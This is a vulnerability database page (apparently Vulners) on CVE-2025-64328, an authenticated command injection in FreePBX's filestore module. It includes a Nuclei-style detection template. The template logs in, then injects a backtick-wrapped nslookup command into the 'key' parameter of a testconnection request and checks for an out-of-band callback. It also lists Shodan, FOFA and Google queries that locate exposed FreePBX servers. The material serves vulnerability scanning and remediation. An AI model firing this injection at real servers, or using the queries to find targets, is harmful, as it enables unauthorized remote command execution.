| Reporter | Title | Published | Views | Family All 23 |
|---|---|---|---|---|
| CVE-2025-64328 | 7 Nov 202503:32 | – | attackerkb | |
| The vulnerability of the “endpoint” web interface module in the IP-telephony system management software FreePBX allows a hacker to execute arbitrary code. | 25 Feb 202600:00 | – | bdu_fstec | |
| CVE-2025-64328 | 7 Nov 202506:07 | – | circl | |
| Sangoma FreePBX OS Command Injection Vulnerability | 3 Feb 202600:00 | – | cisa_kev | |
| CISA Adds Four Known Exploited Vulnerabilities to Catalog | 3 Feb 202612:00 | – | cisa | |
| FreePBX Endpoint Manager 操作系统命令注入漏洞 | 7 Nov 202500:00 | – | cnnvd | |
| CVE-2025-64328 | 7 Nov 202503:32 | – | cve | |
| CVE-2025-64328 FreePBX Administration GUI is Vulnerable to Authenticated Command Injection | 7 Nov 202503:32 | – | cvelist | |
| EUVD-2025-38232 | 7 Nov 202503:32 | – | euvd | |
| FreePBX 17.0.2.36 < 17.0.3 Command Injection (GHSA-vm9p-46mv-5xvw) | 5 Feb 202600:00 | – | nessus |
id: CVE-2025-64328
info:
name: FreePBX >= 17.0.2.36 && < 17.0.3 - Authenticated Command Injection
author: _th3y
severity: critical
description: |
FreePBX Endpoint Manager 17.0.2.36 to < 17.0.3 contains a command injection caused by improper sanitization in filestore module's testconnection check_ssh_connect() function, letting authenticated users execute commands as asterisk user.
impact: |
Authenticated attackers can execute arbitrary commands as the asterisk user, gaining remote access to the system.
remediation: |
Upgrade to version 17.0.3 or later.
classification:
cvss-metrics: CVSS:4.0/AV:N/AC:L/AT:N/PR:H/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N
cvss-score: 8.6
cve-id: CVE-2025-64328
epss-score: 0.84618
epss-percentile: 0.99675
cpe: cpe:2.3:a:sangoma:freepbx:*:*:*:*:*:*:*:*
reference:
- https://github.com/FreePBX/security-reporting/security/advisories/GHSA-vm9p-46mv-5xvw
- https://theyhack.me/CVE-2025-64328-FreePBX-Authenticated-Command-Injection/
- https://www.cisa.gov/news-events/alerts/2026/02/03/cisa-adds-four-known-exploited-vulnerabilities-catalog
metadata:
vendor: sangoma
product: freepbx
shodan-query:
- http.title:"freepbx"
- http.favicon.hash:"-1908328911"
- http.favicon.hash:"1574423538"
- http.title:"freepbx administration"
fofa-query:
- icon_hash="-1908328911"
- icon_hash="1574423538"
- title="freepbx administration"
- title="freepbx"
google-query:
- intitle:"freepbx administration"
- intitle:"freepbx"
tags: cve,cve2025,freepbx,rce,oast,authenticated,vuln,kev,vkev
variables:
username: "{{username}}"
password: "{{password}}"
cmd: "nslookup {{interactsh-url}}"
prefix: "{{rand_text_alpha(5)}}"
flow: http(1) && http(2)
http:
- method: POST
path:
- "{{BaseURL}}/admin/config.php"
headers:
Content-Type: application/x-www-form-urlencoded
body: "username={{username}}&password={{password}}"
matchers:
- type: word
part: body
words:
- 'FreePBX Administration'
- 'Hello, {{username}}'
condition: and
internal: true
- method: GET
path:
- "{{BaseURL}}/admin/ajax.php?module=filestore&command=testconnection&driver=SSH&host=127.0.0.1&user={{prefix}}&port=22&key={{prefix}}`{{cmd}}`&path={{prefix}}"
headers:
Referer: "{{BaseURL}}"
matchers:
- type: word
part: interactsh_protocol
words:
- "dns"
- "http"
# digest: 4a0a0047304502207188d655c209d014df8b76936e6fbc02f5c541cf8831e77963f699167e1ed8b6022100dcad9dd3096c72588a988a1dcc589ae06dfc558ce67aeb16af26cd1667bb180d:922c64590222798bb761d5b6d8e72950Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation